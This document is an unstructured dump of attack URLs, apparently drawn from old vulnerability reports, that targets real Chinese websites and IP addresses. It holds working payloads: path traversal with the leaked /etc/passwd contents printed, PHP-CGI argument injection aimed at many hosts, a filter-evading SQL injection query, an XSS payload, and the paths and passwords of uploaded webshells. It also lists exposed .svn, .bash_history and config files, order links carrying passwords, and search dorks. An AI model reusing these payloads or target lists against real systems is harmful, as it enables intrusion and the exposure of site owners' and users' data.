http://210.74.129.34:8000/EPro/EBid/ManageBid/mortagage.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/mortagage.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/mortagage.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/mortagage.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/mortagage.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/openInvite.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/openInvite.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/openInvite.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/openInvite.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/openInvite.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/openBid.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/openBid.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/openBid.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/openBid.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/openBid.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/QualManage.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/QualManage.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/QualManage.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/QualManage.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/QualManage.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://caigou.irico.com.cn/Rat/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://eps.myande.com/EPro/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://tycg.jiigoo.com/Rat/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://210.74.129.34:8000/EPro/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://caigou.irico.com.cn/Rat/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://eps.myande.com/EPro/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://tycg.jiigoo.com/Rat/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://210.74.129.34:8000/EPro/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://eps.myande.com/EPro/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://118.114.239.38:5555/ http://118.114.239.38:5555/config.asp http://118.114.239.38:8888/tyk/config.asp http://118.114.239.38:808/ http://118.114.239.38:8888/ http://118.114.239.38:5555/config.asp http://login.zk71.com/login.aspx http://login.zk71.com/VIPLogin.aspx exp:fierc https://mail.cdrcb.com/ http://www.hyqss.cn:80/ www.hyqss.cn http://116.213.120.36:8080/login/login.action http://116.213.120.45:8080/login/login.action http://qyba.lnjzfda.gov.cn/list/show.aspx inurl:/opac_two/search2 http://202.200.87.32:1080/opac_two/serials/s_right.jsp?class_no=0 http://222.29.99.40:8080/opac_two/serials/s_right.jsp?class_no=H http://202.196.33.227:8080/opac_two/serials/s_right.jsp?class_no=0 http://opac.cgl.org.cn/opac_two/serials/s_right.jsp?class_no=0 http://219.144.130.220:38080/opac_two/serials/s_right.jsp?class_no=0 http://202.207.193.112:95/opac_two/serials/s_right.jsp?class_no=H http://202.200.87.32:1080/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=JAVA http://202.196.33.227:8080/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=JAVA http://opac.cgl.org.cn/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=%BF%F3%CE%EF http://222.29.99.40:8080/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=A http://219.144.130.220:38080/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=PHP http://202.207.193.112:95/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=APP www.caizhimofang.com http://www.caizhimofang.com www.tuniu.com http://mall.263.net http://mall.263.net/User/HistoryOrders.aspx?oid=123&type=2 http://dm.bocins.com/bocins/f/index/mfx/5* http://dm.bocins.com/bocins/f/index/mfx/5*.html http://dm.bocins.com/bocins/F/activate/fid/1* http://www.zhuliangtian.com/search.aspx?kw=1 a01:13PM a03:01PM a05:24PM a01:50PM http://nj.aibang.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://basset.aibang.com/phpinfo.php http://zhidao.baixing.com/ http://zhidao.baixing.com/wp-content/uploads/2015/06/thanks.php http://**.**.**.**/bugs/wooyun-2010-079791 http://kmcrm.komovie.cn/index.php?r=site/login ftp://dongyuan.hiall.com.cn/ http://IP/cgi-bin/reboot.sh http://IP/cgi-bin/ExportSettings.sh http://IP/cgi-bin/upload.cgi http://IP/cgi-bin/upload_bootloader.cgi http://IP/cgi-bin/upload_settings.cgi http://*.*.*.*/goform/wirelessGetSecurity http://*.*.*.*/status.asp http://www.cemc.com.cn/zdww/ http://kczx.sus.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.sus.edu.cn/download/0739834e-c4d0-45bb-94f0-5e51352c7262.asp http://bioinfo.au.tsinghua.edu.cn/member/fzeng/ http://bioinfo.au.tsinghua.edu.cn/member/fzeng/.bash_history http://ebooking.868e.com/Login.Aspx?Url=/Order_List.Aspx http://122.227.189.178/.svn/entries svn://svn.joy.cn/repos/cms/cms-web_1.0/WebRoot svn://svn.joy.cn/repos https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0 https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0 https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0 http://218.78.217.61:88/ http://ies.hhit.edu.cn/ShowFiles/YQuseList.aspx http://sjjx.jssvc.edu.cn/syjx/share/ShowFiles/YQuseList.aspx http://dqhjsy.nuist.edu.cn/nxdyq/ShowFiles/YQuseList.aspx http://eq.njfu.edu.cn/ShowFiles/YQuseList.aspx http://210.38.64.109/shiyan/share/ShowFiles/YQuseList.aspx http://www.xwb.cdut.edu.cn/admin/ http://**.**.**/evaluation/evaluation/toScoreList.actionidentityNumber= http://wenku.baidu.com/view/97843e9ac281e53a5902ff58.html http://210.75.199.101/mpim/LoginAction.do?action=login http://www.sinopectg.com/user.php?act=get_password http://pop2.shenzhenair.com/data/shell.asp;.jpg http://cw-info.shenzhenair.com/data/shell.asp;.jpg http://cc.263.net/toRegist http://cc.263.net/ajaxAddContactGroups?groupid=69&groupname=%E5%BC%A0%E4%B8%89%E7%9A%84%E7%94%A8%E6%88%B7%E7%BB%841 http://cc.263.net/ajaxDeleteContactGroups?groupid=71 http://cc.263.net/ajaxModifyPerson?addrname=%E7%8E%8B%E4%BA%94&contactids=38208&description=&email=&groupId=72&phonenum=13530018941&phonenum1= http://cc.263.net/deletePerson?contactids=38208 http://cc.263.net/ajaxAddContactGroups?groupid=73&groupname=%E7%BB%84%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://218.213.85.103/cgi-bin/api/sb/hottest_news.cgi?c=../../../../../../../../../../etc/passwd%00&_=1435037199895 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:999:999:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:1000:1000::/home/mysql:/sbin/nologin web:x:99:99::/home/web:/bin/bash www:x:80:99::/home/www:/sbin/nologin ftp_sync:x:1201:99::/usr/home/ftp_sync:/bin/bash sinamgt:x:1202:99::/usr/home/sinamgt:/bin/bash szewai:x:1203:99::/home/szewai:/bin/bash james:x:1204:99::/home/james:/bin/bash kenneth:x:1205:99::/home/kenneth:/bin/bash faiho:x:1206:99::/home/faiho:/bin/bash ice:x:1207:99::/home/ice:/bin/bash winnie:x:1208:99::/home/winnie:/bin/bash kaden:x:1209:99::/home/kaden:/bin/bash nick:x:1210:99::/home/nick:/bin/bash ryan:x:1211:99::/home/ryan:/bin/bash uuidd:x:101:158:UUID daemon:/var/lib/libuuid:/sbin/nologin my3310:x:1212:1000::/data2/mysql3310:/sbin/nologin couchbase:x:102:159:couchbase user:/opt/couchbase:/bin/sh apache:x:48:48:Apache:/var/www:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin memcached:x:103:160:Memcached daemon:/var/run/memcached:/sbin/nologin tom:x:1213:99::/home/tom:/bin/bash jeremy:x:1214:99::/home/jeremy:/bin/bash heiyik:x:1215:99::/home/heiyik:/bin/bash nagios:x:1216:1216::/home/nagios:/sbin/nologin www.letvcloud.com/video/lists?dosubmit=dosubmit&categoryid=0&isdownload=a&penddate=01/01/1967&pstartdate=01/01/1967&searchcontent=&searchid=&status=0&userid=153658&ut=2 http://124.160.192.198/ http://tms.jiuxian.com/Home/#WaiteToDealIndex http://tms.jiuxian.com/Home/#WaiteToDealIndex http://pccsu.suda.edu.cn/web.rar http://english.sinopec.com后面必须加两个/才可以下载 http://english.sinopec.com//web.tar.gz http://101.231.95.27:8091服务器通过扫描端口发现开放着多个端口,进入后发现分别是不同的税务的后台 http://fast.ele.me/ http://fast.ele.me/homepage/LoginHomepage.jsp?hpid=11&isfromportal=1 http://i.gongchang.cn/mod/user/GetPassword/ http://xkyw.bjsf.gov.cn/logon.do?method=logon http://www.myzte.com www.myzte.com http://www.appstar.com.cn http://magazine.tcl.com/article.aspx?id=8491 http://www.to8to.com/new_login.php http://**.**.**.**/order/order_pay.jsp?order_id=3416337&password=341633786084&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418539&password=341853942212&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418620&password=341862050503&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418664&password=341866429820&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418720&password=341872048493&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418738&password=341873887035&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418754&password=341875442491&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418804&password=341880454161&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418837&password=341883788251&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418852&password=341885291263&head=1 http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=213006&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=224620&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=273012&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=244208&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=273378&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=248488&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=209706&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=195041&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=234339&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=212051&info_id= http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/order/order_show.jsp?order_id=3416337&password=341633786084 http://**.**.**.**/order/order_show.jsp?order_id=3418539&password=341853942212 http://**.**.**.**/order/order_show.jsp?order_id=3418620&password=341862050503 http://**.**.**.**/order/order_show.jsp?order_id=3418664&password=341866429820 http://**.**.**.**/order/order_show.jsp?order_id=3418720&password=341872048493 http://**.**.**.**/order/order_show.jsp?order_id=3418738&password=341873887035 http://**.**.**.**/order/order_show.jsp?cust_id=209706&order_id=3418754&password=341875442491&user=32960 http://**.**.**.**/order/order_show.jsp?order_id=3418804&password=341880454161 http://**.**.**.**/order/order_show.jsp?order_id=3418837&password=341883788251 http://**.**.**.**/order/order_show.jsp?order_id=3418852&password=341885291263 www.gyga.gov.cn/cms4jadmin/login.jsp_ http://b2b.haier.com/phpmyadmin/ http://2000235102.flzhan.com/index.html http://acts.zhan.qq.com/module/map/index?mapsId=mapsId_558a709967e26&data=eyJpZCI6Im1hcHNJZF81NThhNzA5OTY3ZTI2Iiwid2lkdGgiOjMyMCwiaGVpZ2h0IjoyMDAsImRhdGEiOnsibGlzdCI6W3siYWRkcmVzcyI6ImNzc3huIiwibGF0IjoiMzkuOTA0MDMiLCJsbmciOiIxMTYuNDA3NTI2IiwiaXNGaW5kVXJsIjoiIiwiaXNEaXJlY3Rpb24iOiIifV0sInpvb20iOiIxMSJ9fQ== www.elife.com域名,希望这个没有重置。 http://passport.elife.com/cas/n/findPwd http://wooyun.org/bugs/wooyun-2010-0111591 http://www.h-h.com.cn/visa/view_visa.aspx?id=74 user:haihua_pek http://web.hangzhou.com.cn/lvyou/admin.php http://www.lfjys.net/ http://www.lfjys.net/ks_name.asp?url=1.asp&ks_id=712&lb=%CB%E6%CC%C3%BF%BC%CA%D4&xx_id=61 http://oa.yccas.com/ http://www.hbsgjj.cn/console/login/LoginForm.jsp http://**.**.**.**/ShowFiles/EquWxList.aspx http://**.**.**.**/syjx/share/ShowFiles/EquWxList.aspx http://**.**.**.**/nxdyq/ShowFiles/EquWxList.aspx http://**.**.**.**/ShowFiles/EquWxList.aspx http://tjbb.zjwst.gov.cn:8080/irpt/i/oem/wsb/login.jsp http://218.85.72.90:8080/irpt/i/oem/wsb/login.jsp http://116.228.189.201:8080/irpt/i/oem/wsb/login.jsp http://www.sdwstj.org/webPage/i/oem/wsb/login.jsp http://222.247.54.151:8080/irpt/i/oem/wsb/index.jsp http://proposal.guohualife.com:8090/ http://proposal.guohualife.com:8091/proposalproxy/api/proposal/system/systemwebservice?wsdl http://www.dahebao.cn/clue/append http://hukao.91huayi.com/news/MoreList.aspx?typeId=1f2169f8-16ea-4570-91ce-9cfc00ecb22f http://**.**.**.**//MessageBoard/MessageView.aspx?MesId=9 http://**.**.**.**/MessageBoard/MessageView.aspx?MesId=1 http://**.**.**.**/MessageBoard/MessageView.aspx?MesId=1 http://**.**.**.**/MessageBoard/MessageView.aspx?MesId=7 http://**.**.**.**//MessageBoard/MessageView.aspx?MesId=29 http://reportplan.ccgp.gov.cn/问题在这个网站 http://reportplan.ccgp.gov.cn/myname/css.jsp http://oa.sohuu.com:81/ http://www.bestv.com.cn//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=d3aeCVNVBFEHBlEEBVxVCgdUAQNeVwIND1EDAAcWDVYOBAAKW10SEURpAEFBDG9TA0sNLVATCAoBdTthCzkKR0FGC0MKDUwpA3IwQEZTRUIie0g http://10.50.127.77/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=d3aeCVNVBFEHBlEEBVxVCgdUAQNeVwIND1EDAAcWDVYOBAAKW10SEURpAEFBDG9TA0sNLVATCAoBdTthCzkKR0FGC0MKDUwpA3IwQEZTRUIie0g http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**:8001/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**:8001/workplate/login.aspx site:myj.com.cn inurl:order http://115.29.188.150:9002/superadmin/adminLogin.action存在命令执行漏洞 http://122.141.234.168:7001/jhgx/login2.jsp http://www.sdjks.cn/content.php?id=[sql http://www.sdjks.cn/content.php?id=1382/*!and*/1=2/*!union*//*!select*/%20null,null,null,null,null,null,schema_name,null,null,null%20from%20information_schema.schemata%20limit%208,8&sorttab=3 http://**.**.**/superadmin/adminLogin.actionisAgent=null&agentUser=null inurl:http://www.gdapp1.e-chinalife.com/upload/pdf/ url:http://www.chaojibiaoge.com/index.php/Oa/Project/viewContent/id/2499/sharekey/70i47z7f url:http://www.chaojibiaoge.com/index.php/Oa/Project/viewContent/id/2499/sharekey/70i47z7f http://www.ayibang.com/index/login?_m http://mall.tjpme.com/fg/user/userreg.do?actionType=regsetp1 http://mall.tjpme.com/userfiles/product/img/20150505/headimg/1430819891792.jsp jdbc:oracle:thin:@10.101.0.54:1521 http://yd.iflytek.com/Address/AddressEdit/577 http://yd.iflytek.com/Bill/BillEdit/279 http://o2odemo.fanwe.net/ https://github.com/tianbaoyang/map/blob/f69a75b8ebcf7810a840d74477d662ea1bac8d4a/src/cn/edu/fudan/mail/Mail.java https://github.com/LoserKe/AccountManageSystem/blob/1019a41412d78566220b64dd5f9b71aca1013557/src/main/java/com/softwareengineering/accountmanager/controller/LogupController.java https://github.com/VELVETDETH/VELVET-PROGRAMMING/blob/9515b5524d05adb2eb9dabe31f99955d95def2d2/Python/query_grade.py http://101.231.33.241 http://101.231.35.97 http://101.231.38.33 http://101.231.38.57 http://101.231.38.118 http://101.231.38.145 https://101.231.38.153 http://101.231.38.241 http://101.231.39.38 http://101.231.39.185 http://101.231.39.193 http://101.231.40.62 http://101.231.40.241 http://101.231.41.57 http://101.231.41.121 http://101.231.41.225 http://101.231.43.17 http://101.231.43.105 http://101.231.45.57 http://101.231.45.82 http://101.231.45.225 http://101.231.46.18 http://101.231.46.25 https://101.231.46.73 http://101.231.46.209 http://101.231.47.9 http://101.231.47.62 http://101.231.47.193 http://101.231.47.241 http://101.231.48.49 http://101.231.48.185 http://101.231.48.242 http://101.231.50.129 http://101.231.50.209 http://101.231.50.241 http://101.231.51.25 http://101.231.51.49 http://101.231.51.65 http://101.231.51.113 http://101.231.52.49 http://101.231.52.57 http://101.231.52.89 http://101.231.52.98 http://101.231.52.129 http://101.231.52.137 http://101.231.52.246 http://101.231.53.1 http://101.231.53.121 http://101.231.53.153 http://101.231.53.177 http://101.231.54.1 http://101.231.54.9 http://101.231.54.185 http://101.231.54.241 http://101.231.55.49 http://101.231.55.94 http://101.231.55.137 http://101.231.55.241 http://101.231.56.57 http://101.231.57.25 http://bbs.49you.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://www.zuk.com/ https://passport.lenovo.com/wauthen3/wauth/jsp/resetPasswordNew.jsp?lenovoid.action=null&lenovoid.realm=null&lenovoid.ctx=null&lenovoid.lang=null&lenovoid.uinfo=null&lenovoid.cb=null&lenovoid.vp=null&lenovoid.display=null&lenovoid_idp=null&lenovoid.source=null&lang=null&username=********@qq.com&verifyCode=293294 https://passport.lenovo.com/wauthen3/wauth/jsp/resetPasswordNew.jsp?lenovoid.action=null&lenovoid.realm=null&lenovoid.ctx=null&lenovoid.lang=null&lenovoid.uinfo=null&lenovoid.cb=null&lenovoid.vp=null&lenovoid.display=null&lenovoid_idp=null&lenovoid.source=null&lang=null&username=********@qq.com&verifyCode=293294 http://bbs.zuk.cn/space.php?uid=416 url:http://www.daimayi.com/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/1 http://a.xcar.com.cn/?zoneclick=102090 http://gznss.capital-online.com.cn http://gznss.capital-online.com.cn/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://202.205.109.105/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://118.194.166.172/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://118.194.166.175/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://211.150.124.83/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://210.32.223.254/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://112.14.182.120/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://ns2.jyb.com.cn/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://211.151.94.131/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://ns.mas.gov.cn/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://115.238.165.99/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://202.205.11.70/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://202.205.109.104/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://115.238.165.99/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://202.107.209.151/index.php?-dauto_prepend_file%3d/etc/passwd+-n https://github.com/cosmoschen/nlpi-activity/blob/8e9c9582413b554abbb74bed4599283b6338f1bf/grails-app/conf/Config.groovy http://www.db56.net/client/pro/article/company_supplydemand_detail.php?id=70&company_id=58 http://baoji.jiwu.com/ http://baoji.jiwu.com/lostPass!lostpassword.action http://**.**.**.**:9999/poweb/showpage.do?status=show&METAID=148196 http://**.**.**.**:8080/poweb/showpage.do?status=show&METAID=68366 http://**.**.**.**:9091/poweb/showpage.do?status=show&METAID=6005 http://**.**.**.**:8000/poweb/showpage.do?status=show&METAID=29574 http://**.**.**.**:8080/poweb/showpage.do?status=show&METAID=30260 http://down.qibosoft.com/down.php?v=fenlei1.0 http://211.151.111.164/manager/html/ http://211.151.111.164/job/ http://211.151.115.164/job/ http://support.xirang.com/support.zip http://218.6.160.231/new/web/web/web/indexmore.asp?leibie=%D0%C2%CE%C5%B1%A8%B5%C0 http://211.151.3.41/job http://211.151.3.42/job http://211.151.3.49/job http://211.151.3.48/job http://211.151.3.69/job http://211.151.3.66/job http://211.151.3.20/job http://211.151.3.19/job http://www.anxin.com/news/?t=1432722338861 http://www.cdb.com.cn www.cdb.com.cn http://www.beiwo.com/.svn/entries http://www.beiwo.com/uc_server/data/config.inc.php www.91zjd.com/recharge/yeepay_recharge.asp http://www.2345.com却不会引发任何告警。 http://www.ppwan.com/Public/check/op/email?0.49405437987297773&clientid=email&email=sample%40email.tst http://123.138.37.156:8090/hljhcms/xt/login.action存在命令执行漏洞 http://123.138.37.156:8090/hljhcms/xt/1.jsp密码123 http://123.138.37.156:8090/hljhcms/2.jsp密码tom http://www.cits.cn/member/bind.html www.cits.cn http://www.cits.cn http://cds.zt-express.com/Area/GetCity?parentId=340000 http://cds.zt-express.com/Area/GetDistrict?parentId=340800 http://cds.zt-express.com/System/main.aspx http://cds.zt-express.com/PageViews/Hall/ApplyList.aspx http://**.**.**/ http://**.**.**.**/order/order_travel.jsp?info_id=7087274 http://**.**.**.**/order/order_travel.jsp?info_id=7275941 http://**.**.**.**/order/order_travel.jsp?info_id=7127739 http://**.**.**.**/order/order_travel.jsp?info_id=7405780 http://**.**.**.**/order/order_travel.jsp?info_id=7443382 http://**.**.**.**/order_travel.jsp?info_id=7412609 http://**.**.**.**/order/order_travel.jsp?info_id=5966371 http://**.**.**.**/order/order_travel.jsp?info_id=7134981 http://**.**.**.**/order/order_travel.jsp?info_id=7388741 http://**.**.**.**/order/order_travel.jsp?info_id=7397742 http://**.**.**.**/order/order_travel.jsp?info_id=7531163 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 